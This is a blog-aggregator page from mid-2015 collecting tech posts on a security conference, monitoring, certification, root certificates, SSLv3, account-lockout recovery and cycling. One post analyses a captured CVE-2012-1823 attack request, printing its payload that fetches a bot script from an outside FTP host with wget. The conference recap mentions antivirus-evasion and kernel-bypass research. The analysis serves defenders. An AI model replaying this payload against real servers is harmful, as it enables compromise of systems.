03 Jul 2015


Xavier Mertens: BSidesLisbon 2015 Wrap-Up

Here is a quick wrap-up of the just-ended BSidesLisbon event. This was the second edition of this BSides event organized in Portugal. The philosophy of these events is well known: organized by and for the community, free, open and creating a lot of opportunities to meet peers. A classic but effective format: talks, lightning talks, a CTF and two tracks running in parallel. Here is a review of the ones I attended.

The day started with my friend Wim Remes's keynote: "Damn kids, they're all alike". Wim's message was: "learn and share". He started with a review of the Hacker's Manifesto. Written in 1986, it remains just as relevant today. Key values are:

Wim addressed the problem of the infosec community versus the industry. While a clear distinction is necessary, at some point we need to move forward and take up our responsibilities by bringing our knowledge into companies and organizations. Some security researchers are seen as rockstars (or want to be one), but that's not the best way to behave. Some of Wim's slides featured good quotes. I particularly liked this one:

Your knowledge is a weapon, you are a threat

The keynote was followed by a series of very interesting questions and exchanges of ideas.

The first talk was given by Doron Shiloach from IBM X-Force: "Taking threat intelligence to the next level". Doron started with a review of the threat intelligence topic, based on a definition by Gartner. From an industry perspective, criteria for evaluation are:

The next part was dedicated to the techniques for building good threat intelligence and where to find the right information. Once that is done, we need to make it available, not only between humans but also between computers. To achieve this, Doron introduced TAXII and STIX. Personally, I found the talk too focused on IBM X-Force services… but anyway, interesting stuff was presented.

For the next time slot, there was only one presentation, as the other speaker was not able to attend the event. The tool Shellter was presented by its developer Kyriakos Economou. After explaining why classical shellcode injection sucks, Kyriakos presented his tool in detail. Shellter is a dynamic shellcode injector with only one goal: evading antivirus detection! The presentation ended with nice demos of maliciously generated files not being detected by AV products! The joy of seeing a scan result on virustotal.com: 0/55!

After the lunch break, I followed Ricardo Dias's presentation about malware clustering. By cluster, we mean here a group of malware samples that share similar structures or behavior. Ricardo's daily job is to detect malicious code and, to improve this task, he developed a tool that creates clusters based on multiple pieces of information about the PE files (only this file type is analyzed). Ricardo explained in detail how clusters are created, using popular algorithms such as reHash or impHash. The next part of the presentation was based on demos of the tool Ricardo created. I was impressed by the quality and accuracy of the information made available through the clusters!

The next talk also focused on security visualization. Tiago Henriques and Tiago Martins presented "Security Metrics: Why, where and how?". Given the amount of data we have to manage today and the multiple sources it comes from, it has become very difficult to analyze it without proper tools. That was the topic presented by Tiago & Tiago. After explaining how to use visualization tools in the right way and answering questions like:

They demonstrated how to extract interesting information from large datasets.

Then, Pedro Vilaça presented his research about malicious kernel modules in OS X: "BadXNU, a rotten apple!". For sure, never, never leave your MacBook unattended close to Pedro! Normally, loading a new module into the OS X kernel triggers checks such as verifying the module signature. Pedro explained how to bypass this and inject malicious code into the kernel. According to Pedro, Apple's controls are poor: the checks should be performed at ring 0 (kernel level) and not in userland, like Microsoft does. Impressive talk!

Finally, my last talk was the one by Tiago Pereira: "What botnet is this?". The talk was a summary of a malware analysis involving a DGA or "Domain Generation Algorithm". The goal was to reverse engineer the malware to understand the domain generation algorithm it used. Also very interesting, especially when he explained how to bypass the packing of the binary to extract the code!

Unfortunately, I was not able to attend the last keynote presented by Steve Lord; I hope that the slides will be available somewhere. The day ended with the speaker dinner (thanks to the organizers for the invitation!) in a relaxed atmosphere. Now it's the weekend and I'll spend some good time with my wife in sunny Lisbon!

03 Jul 2015 10:06pm GMT

Dieter Plaetinck: Focusing on open source monitoring. Joining raintank.

Goodbye Vimeo

It's never been as hard saying goodbye to the people and the work environment as it is now.
Vimeo was created by dedicated film creators and enthusiasts just over 10 years ago, and it still shows today: from the quirky, playful office culture and the short films the staff created, to the tremendous curation effort and Staff Picks (including monthly staff screenings where we got to see the best videos on the internet each month), to the dedication to building the best platform and community on the web for enjoying videos, and the uncompromising commitment to supporting film creators and working in their best interest.
Engineering wise, there has been plenty of opportunity to make an impact and learn.
Nonetheless, I have to leave and I'll explain why. First I want to mention a few more things.

[Photo: Vimeo goodbye drinks]

In Belgium I used to hitchhike to/from work so that each day brought me opportunities to have conversations with a diverse, fantastic assortment of people. I still fondly remember some of those memories. (and it was also usually faster than taking the bus!)
Here in NYC this isn't really feasible, so I tried the next best thing: a mission to have lunch with every single person in the company, starting with those I don't typically interact with. I managed to have lunch with 95 people, get to know them a bit, find some gems of personalities and anecdotes, and have conversations on a tremendous variety of subjects, some light-hearted, some deep and profound. It was fun and I hope to be able to keep doing such social experiments in my new environment.

Vimeo is also part of my life in an unusually personal way. When I came to New York (my first ever visit to the US) in 2011 to interview, I also met a pretty fantastic woman in a random bar in Williamsburg. We ended up traveling together in Europe, I decided to move to the US and we moved in together. I've had the pleasure of being submerged in both American and Greek culture for the last few years, but the best part is that today we are engaged and I feel like the luckiest guy in the world. While I've tried to keep work and personal life somewhat separate, Vimeo has made an undeniable, everlasting impact on my life that I'm very grateful for.

At Vimeo I found an area where a bunch of my interests converge: operational best practices, high performance systems, number crunching, statistics and open source software. Specifically, timeseries metrics processing in the context of monitoring. While I have enjoyed the opportunity to make contributions in this space to help our teams and other companies who end up using my tools, I want to move out of the cost center of the company and into the department that creates the value. If I want to focus on open source monitoring, I should align my incentives with those of my employer, both for my sake and theirs. I want to make more profound contributions to the space. The time has come for me to join a company whose main focus is making open source monitoring better.

Hello Raintank!

Over the past two years or so I've talked to many people in the industry about monitoring, many of them trying to bring me into their team. I never found a perfect fit, but as we transitioned from 2014 into 2015, the stars seemingly aligned for me. Here's why I'm very excited to join the Raintank crew:

OK, so what am I really up to?

Grafana is pretty much the leading open source metrics dashboard right now, so it only makes sense that Raintank is a heavy Grafana user and contributor. My work, logically, revolves around codifying some of the experience and ideas I have and making them accessible through the polished interface that is Grafana, which now also has a full-time UX designer working on it. Since, according to the Grafana user survey, alerting is the most sorely missed non-feature of Grafana, we are working hard on rectifying this and it is my full-time focus. If you've followed my blog you know I have some thoughts on where the sweet spot lies in clever alerting. In short, take the claims of anomaly detection via machine learning with a big grain of salt, and instead focus on enabling operators to express complex logic simply, quickly, and in an agile way. My latest favorite project, Bosun, exemplifies this approach (I highly recommend giving it a close look).

The way I'm thinking of it now, the priorities (and sequence of focus) for alerting within Grafana will probably be something like this:

There's a lot of thought work, UX and implementation detail around this topic. I've created a GitHub ticket to kick off a discussion and am curious to hear your thoughts. Finally, if any of this sounds interesting to you, you can sign up for the Grafana newsletter or the raintank newsletter, which will get you info on the open source platform as well as the SaaS product. Both are fairly low volume.


[Photo: my temporary office near Sausalito] It may look like I'm not doing much from my temporary Mill Valley office, but trust me, cool stuff is coming!

03 Jul 2015 4:22pm GMT

Frank Goossens: Music from Our Tube; the Jadim De Castro groove

Junior Jack's E-Samba is a nice dance classic, but the groove, melody and lyrics were written a long time ago by Jadim De Castro as "Negra Sem Sandalia", and it was featured in "Orfeu Negro", a re-interpretation of the Greek legend of Orpheus and Eurydice by Marcel Camus, set in the context of the Brazilian carnival.

Watch this video on YouTube or on Easy Youtube.


03 Jul 2015 2:53pm GMT

02 Jul 2015


Dieter Plaetinck: Moved blog to hugo, fastly and comma

02 Jul 2015 11:35pm GMT

01 Jul 2015


Dries Buytaert: One year later: the Acquia Certification Program

A little over a year ago we launched the Acquia Certification Program for Drupal. We ended the first year with close to 1,000 exams taken, which exceeded our goal of 300-600. Today, I'm pleased to announce that the Acquia Certification Program passed another major milestone with over 1,000 exams passed (not just taken).

People (myself included) have debated the pros and cons of software certifications for years, so I want to give an update on our certification program and some of the lessons learned.

Acquia's certification program has been a big success. A lot of Drupal users require Acquia Certification, from the Australian government to Johnson & Johnson. We also see many of our agency partners use the program as a tool in the hiring process. While a certification exam cannot guarantee someone will be great at their job (e.g. we only test for technical expertise, not for attitude), it does give a frame of reference to work from. The feedback we have heard time and again is that the Acquia Certification Program is tough but fair, validating skills and knowledge that are important to both customers and partners.

We were also featured in the Certification Magazine Salary Survey as having one of the most desired credentials to obtain. For a first-year program to be identified among certification leaders like Cisco and Red Hat speaks volumes about the respect our program has established.

Creating a global certification program is resource intensive. We've learned that it requires the commitment of a team of Drupal experts to work on each and every exam. We now have four different exams: developer, front-end specialist, back-end specialist and site builder. It takes roughly 40 work days for the initial development of one exam, and about 12 to 18 work days for each exam update. We update all four of our exams several times per year. In addition to creating and maintaining the certification programs, there is also the day-to-day operation of running the program, which includes providing support to participants and ensuring the exams are available for testing around the globe, both online and at test centers. However, we believe that effort is worth it, given the overall positive effect on our community.

We also learned that benefits matter a great deal to participants and that we need to raise the profile of those who achieve these credentials, especially those with the new Acquia Certified Grand Master credential (those who passed all three developer exams). We have a special Grand Master Registry and aim to create a platform for these Grand Masters to share their expertise and thoughts. We do believe that if you have a Grand Master working on a project, you have a tremendous asset working in your favor.

At DrupalCon LA, the Acquia Certification Program offered a test center at the event, and we ended up with 12 new Grand Masters by the end of the conference. We saw several companies stepping up to challenge their best people to achieve Grand Master status. We plan to offer testing at DrupalCon Barcelona as well, so take advantage of the convenient on-site test center and the opportunity to meet and talk with Peter Manijak (who developed and leads our certification efforts), myself, and an Acquia Certified Grand Master or two about Acquia Certification and how it can help you in your career!

01 Jul 2015 1:31pm GMT

29 Jun 2015


Lionel Dricot: The 5 answers to those who want to preserve jobs


If you have been redirected to this page, it is because, in one way or another, you expressed concern about preserving some type of job, or perhaps even proposed ideas to save or create jobs.

The 5 arguments against preserving jobs

Each argument can be explored in more depth by clicking the appropriate link(s).

1. The primary purpose of technology is to make our lives easier and, as a consequence, to reduce our work. Destroying jobs is therefore not a side effect of anything: it is the very goal our species has been pursuing for millennia! And we are succeeding! Why would we want to go backwards in order to reach inefficient full employment?

2. Not working is not a problem. Not having money to live on is. Unfortunately, we tend to conflate work and welfare. We are convinced that only work brings in money, but that is a completely mistaken belief. To go further: What is work?

3. Wanting to create jobs amounts to digging holes just to fill them back in. It is not only stupid, it is also counterproductive and amounts to building the most inefficient society possible!

4. If creating/preserving jobs is an admissible argument in a debate, then absolutely anything can be justified: from the destruction of our natural resources to torture and the death penalty, by way of the sacrifice of thousands of lives on our roads. This is what I call the executioner's argument.

5. Whatever your profession, it will be done better, faster and cheaper by software within the coming decade. This is of course obvious when you think of taxi/Uber drivers, but it also includes artists, politicians and even company executives.

Conclusion: worrying about jobs is dangerously backward-looking. It isn't easy, because this superstition is drummed into us, but it is essential to move on to the next step. Whether we like the idea or not, we already live in a society where not everyone works. That is a fact, and the future doesn't care about your opinion. The question is therefore not how to create/preserve jobs, but how to organize ourselves in a society where jobs are scarce.

Personally, I think that basic income, in one form or another, is an avenue worth exploring seriously.

Photo by Friendly Terrorist.

Thank you for taking the time to read this pay-what-you-want post. Feel free to support me with a few milliBitcoins or a handful of euros, or by following me on Tipeee, Twitter, Google+ and Facebook!

This text is published by Lionel Dricot under the CC-By BE license.


29 Jun 2015 6:51pm GMT

Bert de Bruijn: How to solve "user locked out due to failed logins" in vSphere vMA

In vSphere 6, if the vi-admin account gets locked because of too many failed logins and you don't have the root password of the appliance, you can reset the account(s) using these steps:

  1. reboot the vMA
  2. from GRUB, "e"dit the entry
  3. "a"ppend init=/bin/bash
  4. "b"oot
  5. # pam_tally2 --user=vi-admin --reset
  6. # passwd vi-admin # Optional. Only if you want to change the password for vi-admin.
  7. # exit
  8. reset the vMA
  9. log in with vi-admin

These steps can be repeated for root or any other account that gets locked out.

If you do have root or vi-admin access, "sudo pam_tally2 --user=mylockeduser --reset" would do it, no reboot required.
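
For reference, here is a minimal sketch of checking the counter before resetting it (assuming pam_tally2 is indeed the locking module on your vMA build, as in the steps above):

$ sudo pam_tally2 --user=vi-admin            # show the current failed-login count without resetting it
$ sudo pam_tally2 --user=vi-admin --reset    # clear the counter once the lockout is confirmed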

29 Jun 2015 1:13pm GMT

Laurent Bigonville: systemd integration in the "ps" command

In Debian, since version 2:3.3.10-1, the procps package has the systemd integration bits enabled. This means that the "ps" command can now display which (user) unit has started a process, or to which slice or scope it belongs.

For example with the following command:

ps -eo pid,user,command,unit,uunit,slice

[Screenshot: ps output showing the unit, uunit and slice columns]
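
As a hypothetical usage example (assuming a procps build with the systemd bits enabled, as described above; cron.service is just an illustrative unit name), you can filter that output to list only the processes belonging to one unit:

$ ps -eo pid,user,command,unit | awk '$NF=="cron.service"'

Putting the unit column last makes it easy to match with awk, since the command field itself may contain spaces.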

29 Jun 2015 10:29am GMT

27 Jun 2015


Mattias Geniar: The Broken State of Trust In Root Certificates


Yesterday news came out that Microsoft has quietly pushed new Root Certificates via its Windows Update system.

The change happened without any notification, without any KB article and without anyone really paying attention to it.

Earlier this month, Microsoft has quietly started pushing a bunch of new root certificates to all supported Windows systems. What is concerning is that they did not announce this change in any KB article or advisory, and the security community doesn't seem to have noticed this so far.

Even the official Microsoft Certificate Program member list makes no mention of these changes whatsoever.

Microsoft quietly pushes 18 new trusted root certificates

This just goes to show how fragile our system of trust really is. Adding new Root Certificates to an OS essentially gives the owner of that certificate (indirect) root privileges on the system.

It may not allow direct root access to your machines, but it allows them to publish certificates your PC/server blindly trusts.

This is an open door for phishing attacks with drive-by downloads.

I think this demonstrates two major problems with the SSL certificates we have today:

  1. Nobody checks which root certificates are currently trusted on your machine(s).
  2. Our software vendors can push new Root Certificates in automated updates without anyone knowing about it.

Both problems come back to the basis of trust.

Should we blindly trust our OS vendors to be able to ship new Root Certificates without confirmation, publication or dialog?

Or do we truly not care at all, as demonstrated by the fact we don't audit/validate the Root Certificates we have today?
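
If you want to start auditing, a minimal first step is simply listing what is currently trusted. The commands below are a sketch; store names and paths are assumptions that vary per platform and distribution:

C:\> certutil -store Root
(Windows: dump the machine's trusted Root CA store)

$ ls /etc/ssl/certs/
(most Linux distributions: the CA bundle shipped by the ca-certificates package)

$ trust list | grep label:
(p11-kit based systems: enumerate the configured trust anchors)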

The post The Broken State of Trust In Root Certificates appeared first on ma.ttias.be.


27 Jun 2015 12:53pm GMT

26 Jun 2015


Xavier Mertens: Attackers Make Mistakes But SysAdmins Too!

A few weeks ago I blogged about "The Art of Logging" and explained why it is important to log efficiently to increase the chances of catching malicious activities. There are other ways to catch bad guys, especially when they make errors; after all, they are human too! But it goes the other way around with system administrators as well. Last week, a customer asked me to investigate a suspicious alert reported by an IDS. It looked like a restricted web server (read: one which was not supposed to be publicly available!) was hit by an attack coming from the wild Internet.

The attack was nothing special: a bot scanning for websites vulnerable to the rather old PHP CGI-BIN vulnerability (CVE-2012-1823). The initial HTTP request looked strange:

POST
//%63%67%69%2D%62%69%6E/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%
75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F
%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%
66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6
E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A
%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%
3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3
D%30+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F
%69%6E%70%75%74+%2D%6E HTTP/1.1
Host: -c
Content-Type: application/x-www-form-urlencoded
Content-Length: 90
Oracle-ECID: 252494263338,0
ClientIP: xxx.xxx.xxx.xxx
Chronos: aggregate
SSL-Https: off
Calypso-Control: H_Req,180882440,80
Surrogate-Capability: orcl="webcache/1.0 Surrogate/1.0 ESI/1.0 ESI-Inline/1.0 ESI-INV/1.0 ORAESI/9.0.4 POST-Restore/1.0"
Oracle-Cache-Version: 10.1.2
Connection: Keep-Alive, Calypso-Control

<? system("cd /tmp;wget ftp://xxxx:xxxx\@xxx.xxx.xxx.xxx/bot.php"); ?>

Once decoded, the HTTP query looks familiar:

POST //cgi-bin/php?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -d auto_prepend_file=php://input -n
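
(For reference, a quick way to decode such URL-encoded payloads yourself; python3 is just one convenient option here, not part of the original analysis. The payload is truncated in this example:)

$ echo '//%63%67%69%2D%62%69%6E/%70%68%70?%2D%64+...' | python3 -c 'import sys,urllib.parse; print(urllib.parse.unquote_plus(sys.stdin.read()))'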

Did you notice that the 'Host' header contains an invalid value ('-c')? I tried to understand this header, but to me it looks like a bug in the attacker's code. RFC 2616 covers the HTTP/1.1 protocol and, more precisely, how requests must be formed:

$ nc blog.rootshell.be 80
GET / HTTP/1.1
Host: blog.rootshell.be
HTTP/1.1 200 OK

In the case above, the request was clearly malformed and the reverse proxy sitting in front of the web server decided to forward it to its default web server. If a reverse proxy can't find a valid virtual host to send an incoming request to, it will, based on its configuration, use the default one. Let's take an Apache config as an example:

NameVirtualHost *
<VirtualHost *>
DocumentRoot /siteA/
ServerName www.domainA.com
</VirtualHost>
<VirtualHost *>
DocumentRoot /siteB/
ServerName www.domainB.com
</VirtualHost>

In this example, Apache will use the first block if no other matching block is found. If we query a virtual host 'www.domainC.com', we will receive the homepage of 'www.domainA.com'. Note that such a configuration may expose sensitive data to the wild or expose a vulnerable server to the Internet. To prevent this, always add a default site with an extra block on top of the configuration:

# Default catch-all site: Apache falls back to the first VirtualHost block, so keep it on top
<VirtualHost *>
DocumentRoot /defaultSite/
</VirtualHost>

This site can be configured as a "last resort web page" (as implemented in many load balancers), and why not run a honeypot on it to collect juicy data? Conclusion: from a defender's point of view, try to isolate invalid queries as much as possible and log everything. From an attacker's point of view, always try malformed HTTP queries; maybe you will find interesting websites hosted on the same server!
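
To verify which site actually answers for an unknown or bogus Host header (and to reproduce what the bot did, in a benign way), a quick test could look like this; the hostnames below are placeholders for your own setup:

$ curl -s -H 'Host: www.doesnotexist.example' http://your-reverse-proxy/ | head
$ curl -s -H 'Host: -c' http://your-reverse-proxy/ | head

If you get the content of /defaultSite/ (or your honeypot) back, the catch-all block is doing its job.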

26 Jun 2015 10:21pm GMT

Mattias Geniar: RFC 7568: SSL 3.0 Is Now Officially Deprecated


The IETF has taken an official stance in the matter: SSL 3.0 is now deprecated.

It's been a long time coming. Like many others, we've had SSL 3.0 disabled on all our servers for multiple years now. And I'm happy to report the IETF is making the end of SSL 3.0 "official".

The Secure Sockets Layer version 3.0 (SSLv3), as specified in RFC 6101, is not sufficiently secure. This document requires that SSLv3 not be used.

The replacement versions, in particular, Transport Layer Security (TLS) 1.2 (RFC 5246), are considerably more secure and capable protocols.

RFC 7568: Deprecating Secure Sockets Layer Version 3.0

Initiatives like disablessl3.com have been around for quite a while, urging system administrators to disable SSLv3 wherever possible. With POODLE as its best-known attack, the death of SSLv3 is a very welcome one.
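
If you still have to check or disable it somewhere, a minimal sketch looks like this (the directives below are the standard Apache mod_ssl and nginx ones; adapt them to your own setup):

SSLProtocol all -SSLv2 -SSLv3          (Apache: allow everything except SSLv2/SSLv3)
ssl_protocols TLSv1 TLSv1.1 TLSv1.2;   (nginx: only offer TLS)

$ openssl s_client -connect www.example.com:443 -ssl3

The openssl handshake should now fail; on recent OpenSSL builds the -ssl3 option may not even be available anymore.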

The RFC targets everyone using SSL 3.0: servers as well as clients.

Pragmatically, clients MUST NOT send a ClientHello with ClientHello.client_version set to {03,00}.

Similarly, servers MUST NOT send a ServerHello with ServerHello.server_version set to {03,00}. Any party receiving a Hello message with the protocol version set to {03,00} MUST respond with a "protocol_version" alert message and close the connection.

SSL is dead. Long live TLS 1.2(*).

(*) while it lasts.

The post RFC 7568: SSL 3.0 Is Now Officially Deprecated appeared first on ma.ttias.be.


26 Jun 2015 7:39pm GMT

Frank Goossens: Music from Our Tube; Souldancing on a Friday

While listening to random old "It is what it is" shows (Merci Laurent), I heard this re-issue of Heiko Laux's Souldancer. Now go have some fun, you kids!

Watch this video on YouTube or on Easy Youtube.


26 Jun 2015 11:25am GMT

25 Jun 2015


Joram Barrez: All Activiti Community Day 2015 Online

As promised in my previous post, here are the recordings of the talks done by our awesome Community people. The order below is the order in which they were planned in the agenda (no favouritism!). Sadly, the camera battery died during the recording of the talks before lunch. As such, the talks of Yannick Spillemaeckers […]

25 Jun 2015 12:04pm GMT

23 Jun 2015


Lionel Dricot: "Gravel", or when cyclists chew on gravel


Beware, this bolg really is a bolg about cyclimse. Thank you for your understanding!

In this article, I would like to introduce a cycling discipline that is very popular in the United States: "gravel grinding", which literally means grinding gravel, more often simply called "gravel".

But first, for those who are not familiar with cycling, I will explain why there are several types of bikes and several ways of riding them.

The different types of cycling

You have certainly already noticed that the bikes of the Tour de France riders are very different from the mountain bike your little niece has just acquired.


A road cyclist, by Tim Shields.

Indeed, depending on the course, the cyclist will face different obstacles. On a long road in a windy environment, the cyclist is mainly slowed down by air resistance, so the rider needs to be aerodynamic. On a narrow mountain switchback, the cyclist fights gravity and therefore needs to be as light as possible. On the other hand, on a rocky path descending between the trees, the cyclist's main concern is keeping the wheels in contact with the ground and not breaking the equipment. The bike must therefore absorb the shocks and roughness of the terrain as much as possible.

Finally, a utility bike will aim to maximize the rider's comfort and the bike's practicality, even at the cost of a drastic drop in performance.

Technological trade-offs

Today, bikes are therefore classified according to their use. A very aerodynamic bike will be used for time-trial competitions or triathlons. For classic races, the pros use an "aero" road bike, or an ultra-light bike in the mountains.


An aerodynamic time-trial bike, by Marc

For riding in the woods, a mountain bike is preferred, but mountain bikes themselves come in several variants, the furthest from the road bike being the downhill bike, which is very heavy, loaded with suspension and, as its name suggests, only usable going downhill.

That said, most of these categories stem from technological constraints. Couldn't we imagine an ultra-light bike (suited to the mountains) that is also ultra-aerodynamic (suited to the road or the time trial) and ultra-comfortable (suited to the city)? Yes, we can imagine it. It is not yet possible today and nothing says it ever will be. But it is not theoretically impossible.

The physical trade-off

There is, however, one trade-off that is physically beyond dispute: efficiency versus damping. Any damping causes a loss of efficiency; that is unavoidable.

Damping has two functions: keeping the bike in contact with the road even on an uneven surface, and preserving the physical integrity of the bike as well as the comfort of the rider.

The cyclist moves forward by applying a force to the road through the drivetrain and the tires. The action-reaction principle means the road applies a proportional force back onto the bike, which is what makes it move forward.

Damping, on the other hand, aims to dissipate the forces transmitted to the bike by the road. Physically, it is thus clear that efficiency and damping are diametrically opposed.


A downhill bike, by Matthew.

To convince yourself, just borrow a bike fitted with suspension and set it to maximum damping. Then try to climb a steep road for several hundred meters. You will immediately feel that every pedal stroke is partially absorbed by the bike.

Show me your tires and I will tell you who you are…

The main damper present on every type of bike, without exception, is the tire. The tire is filled with air, and the compression of that air absorbs shocks.

A widespread idea holds that road bikes have thin tires because wide tires would increase friction with the road. That is completely false. In fact, all tires seek to grip the road as much as possible, because it is this friction that transmits the energy. A tire that does not grip the road spins, which is something we want to avoid at all costs.

It has even been shown that wider tires transmit more energy to the road and are more efficient. That is one of the reasons why Formula 1 cars have very wide tires.

However, very wide tires also mean more air and therefore more damping. Wide tires thus dissipate more energy with every pedal stroke!


Mountain bike wheels, by Vik Approved.

C'est pourquoi les vélos de route ont des pneus très fin (entre 20 et 28mm d'épaisseur). Ceux-ci sont également gonflés à très haute pression (plus de 6 bars). La quantité d'air étant très petite et très comprimée, l'amortissement est minimal.

Par contre, en se déformant les pneus larges permettent d'épouser les contours d'un sol inégal. En amortissant les chocs, ils sont également moins sensibles aux crevaisons. C'est la raison pour laquelle les VTT ont des pneus qui font généralement plus de 40mm d'épaisseur et qui sont moins gonflés (entre 2 et 4 bars). Des pneus plus fins patineraient (perte d'adhérence) et crèveraient au moindre choc.

En résumé, le pneu est certainement l'élément qui définit le plus un vélo, c'est véritablement sa carte d'identité. Pour en savoir plus, voici un lien très intéressant sur la résistance au roulement des pneus.

Between the road bike and the mountain bike

We have thus defined two broad families of sport bikes. First, road bikes, with tires under 30 mm, built for speed on a relatively smooth surface but incapable of riding off the tarmac. Then mountain bikes, with tires over 40 mm, able to go anywhere but so inefficient on the road that it is usually better to drive them by car to wherever you want to ride. There are also many other types of bikes, but they are less efficient in terms of performance: the city bike, inspired by the mountain bike, which optimizes practicality; the "Dutch bike", which optimizes comfort in a completely flat country with well-maintained cycle paths; or the fixie, which optimizes the hipster factor of its owner.

But couldn't we imagine a performance-oriented bike that would be efficient on the road and could go anywhere a mountain bike goes?

To answer that question, we need to look at a discipline that is particularly popular in Belgium: cyclocross. Cyclocross consists of taking a road bike, fitting it with slightly wider tires (between 30 and 35 mm) and riding it through the mud in winter. When the mud is too deep or the terrain too steep, the rider dismounts, shoulders the bike and runs while carrying it. The idea is that, in those situations, it is faster anyway to run (10-12 km/h) than to pedal (8-10 km/h).


A cyclocross racer, by Sean Rowe

A cyclocross bike must therefore be light (so it can be carried), able to ride and corner in the mud, but with minimal damping so as to remain efficient on the smoothest sections.

This kind of setup turns out to be quite efficient on the road: a cyclocross bike rolls past 30 km/h without difficulty, yet it can also keep up with a traditional mountain bike on forest trails. The lesser damping does, however, require slowing down on very rough descents, and the most technical climbs on the muddiest ground require carrying the bike (sometimes with the unexpected result of overtaking mountain bikers spinning away in a low gear).

The birth of gravel

While a road race can be run over long distances between a start and a finish, cyclocross, mountain biking and the other disciplines are traditionally confined to a short circuit that the competitors lap several times. The first reason is that nowadays it is hard to design a long course that does not go over roads.

Moreover, while motorcycles and cars can accompany road bikes to provide food, technical support and media coverage, the same is not true for mountain bikes. It is therefore impossible to properly film a mountain bike or cyclocross race contested over several dozen kilometers through the woods.

The kind of road that gives the discipline its name.

L'idée sous-jacente du « gravel » est de s'affranchir de ces contraintes et de proposer des courses longues (parfois plusieurs centaines de km) entre un départ et une arrivée mais en passant par des sentiers, des chemins encaissés et, surtout, ces longues routes en gravier qui sillonnent les États-Unis entre les champs et qui ont donné leur nom à la discipline. Le passage par des routes asphaltées est également possible.

Des points de ravitaillements sont prévus par les organisateurs le long du parcours mais, entre ces points, le cyclistes sera le plus souvent laissé à lui-même. Transporter des chambre à air, du matériel de réparation et des sparadraps fait donc partie du sport !

Quand à la couverture média, elle sera désormais effectuée par les cyclistes eux-mêmes grâce à des caméras embarquées sur les vélos ou sur les casques.

L'essor du gravel

Au fond, il n'y a rien de vraiment neuf. Le mot « gravel » n'est jamais qu'un nouveau mot accolé à une discipline vieille comme le vélo lui-même. Mais ce mot « gravel » a permis une renaissance et une reconnaissance du concept.

Le succès des vidéos embarquées de cyclistes parcourant 30km à travers champs, 10km sur de l'asphalte avant d'attaquer 500m de côtes boueuses et de traverser une rivière en portant leur vélo contribuent à populariser le « gravel », principalement aux États-Unis où le cyclo-cross est également en plein essor.

La popularité de courses comme Barry-Roubaix (ça ne s'invente pas !) ou Gold Rush Gravel Grinder intéresse les constructeurs qui se mettent à proposer des cadres, des pneus et du matériel spécialement conçus pour le gravel.

Taking up gravel?

Unlike road cycling or mountain biking on a circuit, gravel has a romantic side. Adventure, getting lost, exploring and discovering are an integral part of the discipline. In the Deux Norh team, for example, rides are called "hunts". The point is not so much the athletic feat as telling an adventure, a story.


L'auteur de ces lignes au cours d'une montée à travers bois.

Le gravel étant, par essence, un compromis, les vélos de cyclo-cross sont souvent les plus adaptés pour le pratiquer. D'ailleurs, beaucoup de cyclistes confirmés affirment que s'ils ne devaient avoir qu'un seul vélo pour tout faire, ce serait leur vélo de cyclo-cross. Cependant, il est tout à fait possible de pratiquer le gravel avec un VTT hardtail (sans amortissement arrière). Le VTT est plus confortable et passe plus facilement les parties techniques au prix d'une vitesse moindre dans les parties plus roulantes. Pour les parcours les plus sablonneux, certains vont jusqu'à s'équiper de pneus ultra-larges (les « fat-bikes »).

Par contre, je n'ai encore jamais vu de clubs de gravel ni la moindre course organisée en Belgique. C'est la raison pour laquelle j'invite les cyclistes belges à rejoindre l'équipe Belgian Gravel Grinders sur Strava, histoire de se regrouper entre gravelistes solitaires et, pourquoi pas, organiser des sorties communes.

Si l'aventure vous tente, n'hésitez pas à rejoindre l'équipe sur Strava. Et si vous deviez justement acheter un nouveau vélo et hésitiez entre un VTT ou un vélo de route, jetez un œil aux vélos de cyclo-cross. On ne sait jamais que vous aillez soudainement l'envie de bouffer du gravier !

Cover photo by the author.

Thank you for taking the time to read this pay-what-you-want post. Feel free to support me with a few milliBitcoins or a handful of euros, or by following me on Tipeee, Twitter, Google+ and Facebook!

This text is published by Lionel Dricot under the CC-By BE license.


23 Jun 2015 4:17pm GMT

Dries Buytaert: Winning back the Open Web

The web was born as an open, decentralized platform allowing different people in the world to access and share information. I got online in the mid-nineties when there were maybe 100,000 websites in the world. Google didn't exist yet and Steve Jobs had not yet returned to Apple. I remember the web as an "open web" where no one was really in control and everyone was able to participate in building it. Fast forward twenty years, and the web has taken the world by storm. We now have hundreds of millions of websites. Look beyond the numbers and we see another shift: the rise of a handful of corporate "walled gardens" like Facebook, Google and Apple that are becoming both the entry point and the gatekeepers of the web. Their dominance has given rise to major concerns.

We call them "walled gardens" because they control the applications, content and media on their platform. Examples include Facebook or Google, which control what content we get to see; or Apple, which restricts us to running approved applications on iOS. This is in contrast to the "open web", where users have unrestricted access to applications, content and media.

Facebook is feeling the heat from Google, Google is feeling the heat from Apple but none of these walled gardens seem to be feeling the heat from an open web that safeguards our privacy and our society's free flow of information.

This blog post is the result of people asking questions and expressing concerns about a few of my last blog posts like the Big Reverse of the Web, the post-browser era of the web is coming and my DrupalCon Los Angeles keynote. Questions like: Are walled gardens good or bad? Why are the walled gardens winning? And most importantly; how can the open web win? In this blog post, I'd like to continue those conversations and touch upon these questions.

Are "walled gardens" good or bad for the web?

